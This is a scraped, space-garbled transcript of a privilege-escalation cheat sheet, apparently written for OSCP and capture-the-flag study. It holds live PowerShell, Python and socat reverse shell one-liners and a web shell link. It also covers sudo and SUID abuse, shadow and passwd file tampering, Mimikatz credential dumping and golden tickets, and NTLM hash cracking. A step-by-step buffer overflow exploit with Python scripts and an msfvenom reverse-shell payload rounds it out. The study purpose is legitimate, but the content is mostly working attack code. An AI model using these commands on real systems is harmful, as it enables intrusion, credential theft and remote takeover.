https: //w ww.h os tin gma nua l.n et/ zip pin g-u nzi ppi ng- fil es- unix/

GTFOBins

Usage Syntax

Vim Text Editor https: //g tfo bin s.g ith ub.i o/ gtf obi ns/vim/

Service Exploi ‐tation

Exploiting any service which is running as root Also provide the file path to the service's

executable

To exploit aservice

Execute it for example <pa th_ to_ the _se rvi ce> -> /usr/b in/sudo /usr/b in/ jou rnalctl -n5 -unost rom ‐

o.s ervice You can get this from GTFObins but need to

find out path

GTFOBins (cont)

/systemctl(suid but set)

service is an " hig h-l eve l" command used forstart, restart, stop and status services in differentUnixes and Linuxes. Service is adequate for basic service manage ‐

ment, while directly calling systemctl give greatercontrol options. Our target system allows any logged in user to

create a system service and run it as root!

Sudo -l sudo -l show you what exact command you areauthorized to use

(ALL, !root)NOPASSWD:/usr/b in/vi

The !root is a cve vulner ability which can beexploited through sudo -u#-1 <pa th_ whe re_ use r_c an_ exe cut e_s ‐

udo _co mma nd>

If sudo - lspecifies Vim

Use esc and then :! as we are going to type asystem command and then we specify executablesh (:!sh)

GTFOBins is a curated list of Unix binaries that can be exploited byan attacker to bypass local security restri ctions.

The project collects legitimate functions of Unix binaries that can beabused to break out restricted shells, escalate or maintain elevatedprivil eges, transfer files, spawn bind and reverse shells, and facilitatethe other post-e xpl oit ation tasks.

Windows Enumer ation

Command Usage







https://jc01.ninja/ctf/privesc-playground/

https://mzfr.github.io/linux-priv-esc

https://linuxize.com/post/how-to-use-linux-ftp-command-to-transfer-files/

https://www.hostingmanual.net/zipping-unzipping-files-unix/

https://gtfobins.github.io/gtfobins/vim/




Windows Enumer ation (cont)

BiggestEnumer ationHint

his is going to sound like.im being dising enuous, butyou need to learn how to figure things out. Each machinemight require a tool you haven't even heard of yet, but youhave to figure that part out. Knowing what and how toGoogle is arguably the most valuable skill.

Hint -Users

names are impotant! might be subdomain or readunderstand might be username passwd

Hint -Findingtheright file

The service at the starting off the box can be later onchecked for conf or file for username passwd

Github-working

Create branch Now push file into that branch Click on the uploaded file and PULL request Completepull request is same as Commit Approve andComplete the Merge


ActiveDirectory

TryHackMe Room A Windows Domain allowsmanagement of large computer networks They usea Windows server called a DC (domain contro ller) A DC is any server that has Active Directory domainservices role DC respond to authen tic ationrequests across the domain DCs have the tool AD(active directory) and GP (group policy) ADcontains objects and OUs (Organ iza tional Units) GP contains GPOs (Group Policy objects) thatmanage settings for AD objects

Netbiosport 137

Hacktrick enumer ation

SMB port139

smbclient -L <ip> - yields inform ation such assharename and its type

SVNPORT NO- 3690 andits simplyVersionTrackingWithSubversion(SVN)

First view the log svn log svn:// wor ker.htb/ Now you can view the difference between those

commits svn diff svn://htb/ -r 2

SubversionCommands

http:/ /ww w.y oli nux.co m/T UTO RIA LS/ Sub ver sio n.h tml ‐#SV NPR OPE RTIES

SVN Subversion cannot find a proper .svn directory inthere.

Reverseshells

https: //h ack ers int erv iew.co m/o scp /re ver se- she ll- one -li ‐ner s-o scp -ch eat sheet/







svn://worker.htb/

http://www.yolinux.com/TUTORIALS/Subversion.html#SVNPROPERTIES

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/





Powershellreverseshell

powershell -nop -c " $client = New-Object System.Ne ‐t.S ock ets.TC PCl ien t(' 192.16 8.1.2' ,44 44) ;$s tream =$clien t.G etS tre am( );[ byt e[] ]$bytes = 0..655 35| %{0 };w ‐hil e(($i = $strea m.R ead ($b ytes, 0, $bytes.Le ngth)) -ne0){;$data = (New-O bject -TypeName System.Te xt.A ‐SC IIE nco din g).G et Str ing ($b ytes,0, $i);$s endback =(iex $data 2>&1 | Out-String );$sen dback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sen dbyte =([text.en cod ing ]:: ASC II).Ge tBy tes ($s end bac k2) ;$s tre ‐am.W ri te( $se ndb yte ,0, $se ndb yte.Le ngt h); $st rea m.F ‐lus h() };$ cli ent.Cl ose ()"

Windowsintera ctiveshell(ASPXShell byLT)

https: //g ith ub.c om /xl 7de v/W ebS hel l/b lob /ma ste r/A ‐spx /AS PX% 20S hel l.aspx

Dumpingpasswordsandhashes onwindows

This most probably requires admini str ative permis ‐sions. Windows stores passwords in SAM - SecurityAccount Manager. Passwords are stored differ entlydepending on the operating system. There are 2 Authen tic ation mechanism that

produce 2 Hashes - LM LAN Manager (LM) and NTLAN Manager (NTLM) > VISTA.


CredentialDumping:SAM(tools)

The Security Accounts Manager (SAM) is a registryfile in Windows NT and later versions until the mostrecent Windows 8. It stores users’ passwords in ahashed format (in LM hash and NTLM hash). Since ahash function is one-way, this provides some measureof security for the storage of the passwords. SAM is found in C:\Win dow s\S yst em3 2\c onfig and

passwords that are hashed and saved in SAM canfound in the registry, just open the Registry Editor andnavigate yourself to HKEY_L OCA L_M ACH INE \SAM. Windows 7 - SamDump2, PwDump7, Metasploit

framework Windows 10 - Mimikatz, Impacket, Metasploit

Framework - Hashdump and load_k iwi (mi mikatz) The Registry is essent ially a database. Its inform ‐

ation is stored on disk for the most part, thoughdynamic inform ation also exists in the computer’smemory

Windows Priv. Esc. || Metasploit Module

Name Usage

Microsoft Remote Desktop (MSRDP) Port no - 3389







https://github.com/xl7dev/WebShell/blob/master/Aspx/ASPX%20Shell.aspx




Windows Priv. Esc. || Metasploit Module (cont)

Local SecurityAuthoritySubsystemService

lsass service The service respon sible for authen tic ation

within Windows. We generally infect a process with the

migrate command in metasploit to infect aprocess that can commun icate with lsass.exeand has permis sions that are needed to interact

To exploit lsasswe need to be Same archit ‐ecture (living in) Same permis ‐

sions

In order to interact with lsass we need to be'living in' a process that is the same archit ectureas the lsass service (x64 in the case of thismachine) and a process that has the samepermis sions as lsass.

Printer service spoolsv.exe The printer spool service

Living in as aprocess

Often when we take over a running programwe ultimately load another shared library intothe program (a dll) which includes our maliciouscode. From this, we can spawn a new threadthat hosts our shell.

msfconsole >>search <Pr ogr ‐am/ Pro ces s>

Fire up msfconsole terminal and search forvulnerable exploit of a program or process

Select a exploit Select using #use <no> Remeber to use#search options command and set them accord ‐ingly


Fire theexploit

#run them after setting up options

Metasploitcommandcenter

#getuid (user-id) #sysinfo #getprivs #migrate -N PROCES S_NAME

Local_ ‐exploit V/SRemote ‐_ex ploit

A remote exploit works over a network andexploits the security vulner ability without any prioraccess to the vulnerable system. A local exploitrequires prior access to the vulnerable system andusually increases the privileges of the person runningthe exploit past those granted by the system admini ‐str ator.

Local_ ‐exploit(metas ploit)

run post/m ult i/r eco n/l oca l_e xpl oit _su ggester Results for potential escalation exploits. Local exploits require a session to be selected

Backgrounda session(someprivil edge)

#background This provides us with a session number which can

be used in combin ation with another exploit toescalate privil edges

Mimikatz(passworddumpingtool)

#load kiwi (Kiwi is the updated version of Mimikatz)load kiwi (Kiwi is the updated version of Mimikatz) Expanded the options use #help to view them











Mimikatz allowsus to createwhat's called agolden

ticket, allowingus to authen ticateanywhere withease.

golden_ticket_create Golden ticket attacks are a function within

Mimikatz which abuses a component toKerberos (the authen tic ation system inWindows domains), the ticket -gr anting ticket. Inshort, golden ticket attacks allow us to maintainpersis tence and authen ticate as any user on thedomain.

Windows NTLMhash crack

hashcat -a 0 -m 1000 crack.hash /usr/s har e/w ‐ord lis ts/ roc kyo u.txt

Privilege escalation

Usage Syntax

Fast LinuxPriv. EscChecklist

uname - a id sudo - l etc/cr ontab suid linpeas linux- exp loi t-s ugg estor pspy

netstat capabi lities search dir for juice use ps-aux | grep root to look at any services that are runningas root. Password Spray Config files of service running

might leak creds

C program make <.c progra m> then ./ to execute

SCP(securecopy files)from localto remotemachine

scp <fi len ame> userna me@ ip: <lo cat ion>

Pythonserver

python3 -m http.s erver

Unix infoabout yourspecificLinuxdistri bution

lsb_re lease -a uname -a

Use echo "text " intofile

echo " tex t" > output.txt

Privilege escalation (cont)

Pythonreverse shellwith newlinechar

python -c 'import socket ,su bpr oce ss, os; s=s ock ‐et.s oc ket (so cke t.A F_I NET ,so cke t.S OCK _ST REA ‐M); s.c onn ect (("1 0.1 0.1 4.1 57", 123 5)) ;os.du p2( s.f ile ‐no( ),0); os.dup 2(s.fi len o(),1); os.dup 2(s.fi len ‐o() ,2) ;p= sub pro ces s.c all (["/ bin /sh " ,"-i "]);'

ViewCronjobs

cat /etc/c rontabs

Exploitingsudo -l userNOPASSWD:ALL

sudo -i -u <us er>

Sudoknowledge

su asks for the password of the user " roo t". sudo asks for your own password (and also

checks if you're allowed to run commands as root,which is configured through /etc/s udoers -- bydefault all user accounts that belong to the " adm in"or " sud o" groups are allowed to use sudo). sudo -s launches a shell as root, but doesn't

change your working directory. sudo -i simulates alogin into the root account: your working directorywill be /root, and root's .profile etc. will be sourcedas if on login.

Sudo -l(explo itingsudo rights)

Super User Do root privilege task https: //w ww.h ac kin gar tic les.in /li nux -pr ivi leg e-e ‐

sca lat ion -us ing -ex plo iti ng- sud o-r ights/

After SSH







https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/





id id command in Linux is used to find out user andgroup names and numeric ID's (UID or group ID) ofthe current user or any other user in the server

id shows108(lxd)

LXD privilege escalation

Weak FilePermission

ls -l <fi le> : Check Permis sions

Readable/etc/s ‐hadow

Crack the passwd, SHA-512

Writeable/etc/s ‐hadow

Create and replace the passwd, mkpasswd -m sha-512 newpas swo rdhere

Writeable/etc/p ‐asswd

Create and replace the passwd, openssl passwdnewpas swo rdhere

.sudo_ as_ ‐adm in_ ‐suc cessful

Means that the user can run something as root Check SUID and Sudo -l Refer to checklist

Socat(morepowerfulversion ofnc)

We can use socat to send ourselves a root shell. Attacking machine: socat file:tty ,r aw, echo=0 tcp-

listen:1234 Remote machine: sudo socat tcp-co nne ct: <yo ur- ‐

ip- add res s>:1234 exec:b ash ,pt y,s tde rr, set sid ,si gin ‐t,sane Socat Reverse shell as root https: //w ww.m ar iti mec ybe rse cur ity.ce nte r/l inu x-f or- ‐

pen tes ter -so cat -pr ivi leg e-e sca lation/


Reverseshell(one-l ‐iners)

Reverse shell - 1)Bash -ru nning linux, 2)Python,3)Nc, 4)PHP Reverse shell Script

LinuxPrivilegeEscalationChecklist

Guide to follow if stuck

Linux PrivEsc

Kernel exploits : uname -a Execute command asroot : Sudo -l Find binary we can execute as root :SUID check cronjobs , monitor linux system :PSPY64

Fewthings toremember

If root is executing a File and we can access that filethen we can get a reverse shell, Mostly cron jobs canbe exploited like this OR if you can execute the file asroot but cant write it then delete it and execute to get areverse shell

Linux PrivEsc viaCapability(getcap)

To identify if it exist type getcap -r / 2>/ dev /null







https://www.hackingarticles.in/lxd-privilege-escalation/

https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/

https://cheatography.com/blacklist/cheat-sheets/linux-windows-privilege-escalation/%22https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/%22

https://j-s-tymchuk.gitbook.io/penetration-testing-playbook/networking-and-shells/reverse-shells

https://github.com/t0thkr1s/revshellgen

https://j-s-tymchuk.gitbook.io/penetration-testing-playbook/privilege-escalation/linux-privilege-escalation




Buffer Overflows (OSCP procedure)

Steps Commands

References � Cybermentor BoF Notes Buffer Overflow Guide

1. SPIKING |Testingcommands tofind vulnerable

� We are trying to test multiple commands and tryto find what's vulner able. For ex for TRUN function ─(root�Kali)-[~/Koth] └─# cat spike.spk s_readline(); s_string("TRUN "); s_string_variable("0");

Attacking Machine nc -nv 10.0.2.14 9999 generic_send_tcp 10.0.2.14 9999 spike.spk 0 0 Lookout for Buffer Overflow in Registers

2. FUZZING |Crash TheApplic ation

� We will now go ahead and attack that commandspecif ically in FUZZING When The RegistersGets Crashes and we see TRUN being affected We will stop the exploit via ctrl+c to stop it and

we will get an estimate of at what bytes the TRUNgot affected Like its 2800 bytes -> we can round off and

make it 3000

#!/usr/bin/python

import sys, socket

from time import sleep

buffer = 'A' 100

while True:

try:

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('10.0.2.14',9999))

s.send (('TRUN /.:/' + buffer))

s.close()

sleep(1)

buffer = buffer + 'A' 100

except:

print( " Fuzzing crashed at %s bytes" %str(len(buffer)))

sys.exit()

Buffer Overflows (OSCP procedure) (cont)

Goal : Is to know approx imately to know where wecrashed at, what bytes Once it break print out an exception, Fuzzing crashed

at X bytes Now we will be finding where the EIP is at, we are

gonna use a tool

3.FINDINGTHEOFFSET| FindEIP

� First we will use patter n_c reate msf tool we created3000 bytes , then run exploi t.py. After that we will usepatter n_o ffset by specifying the value of EIP which willbe within those 3000 bytes To grab the offset

Tool : Pattern Create /usr/ sha re/ met asp loi t-f ram ewo ‐rk/ too ls/ exp loi t/p att ern _cr eate.rb -l 3000

#!/us r/b in/ python import sys, socket offset = (' ')

try:

s=sock et.s oc ket (so cke t.A F_I NET ,so cke t.S OCK _ST REAM)s.conn ect ((' 10.0.2.14 ',9 999)) s.send (('TRUN /.:/' + offset)) s.close()

except:

print( " Error Connecting to the Server ") sys.ex it()

Tool : Pattern Offset patte rn_ off set.rb -l 3000 -q<VA LUE /FI NDI NG> from EIP

Goal: This offset inform ation is critical because nowwe know that at this byte we can control the EIP, We willoverwrite it with specific bytes This offset inform ation is critical because now we

know that at this byte we can control the EIP, Now we will overwrite it with specific bytes







https://tcm-sec.com/buffer-overflows-made-easy/

https://github.com/gh0x0st/Buffer_Overflow





4. OVERWR ITING THE EIP |Control ESP

� We discovered that the offset is at2003 bytes, It means there are 2003 bytes

right before, EIP begins

#!/usr /bi n/p ython import sys, socket

shellcode = 'A' 2003 + 'B' 4

try:


s.connect(('10.0.2.14',9999))

s.send (('TRUN /.:/' + shellcode))s.close()

except:

print( " Error Connecting to the Server")sys.exit()

Goal : Control this EIP now TRUN got filled with a bunch of

As EBP, bottom is filled with

41414141 EIP, return is filled with

42424242 Now, we only sent bytes of Bs

and they all landed up in EIP

5. FINDING THE BADCHARACTERS in HexDump,Note them & x00 is a bad char

Manually Identify Bad Chars After running the script, EIP will besame 4242 but we will work onHexdump to find bad guys. Sequence Flow : 1-9 -> a-f ->

10-19 -> 1a-1f -> 20-29 -> 2a-2f Add string with badchar + " bla ‐

ckl ist " To identify End of Buffer



badchar = ("\x 01 \xff ") #all bad char will be sentshellcode = 'A' 2003 + 'B' 4 + badchar

try:

s=sock et.s oc ket (so cke t.A F_I NET ,so cke t.S OCK _ST REAM)s.connect(('10.0.2.14',9999))


except:


x 01 - 09 20 - 29 40 - 49 60 - 69 80 - 89 0a - 0f 2a - 2f 4a - 4f 6a - 6f 8a - 8f 10 - 19 30 - 39 50 - 59 70 - 79 90 - 99 1a - 1f 3a - 3f 5a - 5f 7a - 7f 9a - 9f x a0 - a9 c0 - c9 e0 - e9 aa - af ca - cf ea - ef b0 - b9 d0 - d9 f0 - f9 ba - bf da - df fa - ff x

Goto HexDump, by Right click ESP (top)in register > Follow Dump > Ok We will go through this whole list We see if there is anything out of place

now We got 01 02 03 ..B0.. ..B0.. B6 B7 B8.

We have B4 and B5 Missing -> Those areBad Characters This is EYE TEST, We Need to make

sure we find everyt hing, which is out ofplace

6. FINDING THERIGHT MODULE |Find JMP ESP

� Goal : To find a JMP ESP that we will useto tell the applic ation to execute our code. mona modules > Select all with False,

means no memory protection in this module

!mona modules nasm_ shell -> JMP ESP !mona find -s " \xf f\x e4" -m essfun c.dll rclick on panel > search for the return address we found It will have JMP ESP & FFE4 location F2 > Put a break point







https://www.ins1gn1a.com/identifying-bad-characters






#625011AF

shellcode = 'A' * 2003 + '\xaf\x11\x50\x62'

try:


s.connect(('10.0.2.14',9999))


except:


� Finally, we were able to provide EIP an validreturn address JMP ESP where it can point to inthe memory Ran our script with that Pointer address,

affecting directly EIP area Changed EIP return address - DONE!

7.GENERATINGSHELLCODE

� Our EIP will point to the JMP ESP, which will runour malicious shellcode and give us root (hopef ‐ully). msfvenom -p window s/s hel l_r eve rse_tcpLHOST= 10.0.2.5 LPORT=4444 EXITFU NC= ‐thread -f c -a x86 -b " \x0 0"


overflow = ("Inside this malicious shellc ode ") shellcode = 'A' 2003 + '\xaf \x11 \x5 0\x62' + '\x90'

32 + overflow

try:

s=sock et.s oc ket (so cke t.A F_I NET ,so cke t.S OCK _ST REAM)s.conn ect ((' 10.0.2.14 ',9 999)) s.send (('TRUN /.:/' + shellc ode)) s.close()

except:

print( " Error Connecting to the Server ") sys.exit()


� Shellcode need 4 things 1. The exact number of bytes to crash (Crash Point) 2. The value of the JMP ESP that will instruct the applic ‐

ation to execute our code (Return Address) 3. Padding (No-opn) 4. shellcode to grab reverse shell

8.ROOT|Exploit

Check real-time protection is off & Antivirus whileplaying with this method \x41, \x42, \x43 - The hexade cimal values for A, B and

C.

Anatomy of Stack : EBEE ESP (Extended Stack Pointer) : Its at the TOP Buffer Space : Fills and goes downward, should stop before EBP

& EIP EBP (Extended Base Pointer) : Its at the BOTTOM EIP (Extended Instru ction Pointer) : Its the Return Address

ESP The Extended Stack Pointer (ESP) is a register that lets

you know where on the stack you are and allows you topush data in and out of the applic ation.

EIP Its the Return Address, and we can use this address to

point to direct ions. It can be malicious code to gain reverseshell The Extended Instru ction Pointer (EIP) is a register that

contains the address of the next instru ction for the programor command.











JMP The Jump (JMP) is an instru ction that modifies the flow of

execution where the operand you designate will contain theaddress being jumped to.

1 Spiking : Method to find the vulnerable part of the program2 Fuzzing : We will send a bunch of characters to the program tocheck if it breaks it3 Finding the Offset : If we break it, we want to find out the point atwhich we break it4 Overwr iting the EIP : We will use that offset to override the EIP,that pointer address can be controlled+ EIP contro lled, 2 * 5 Finding Bad Character* 6 Finding the Right Module7 Generating Shellcode+ Root









Linux | Windows Privilege Escalation Cheat Sheet by blacklist_

Documents

Transcript of Linux | Windows Privilege Escalation Cheat Sheet by blacklist_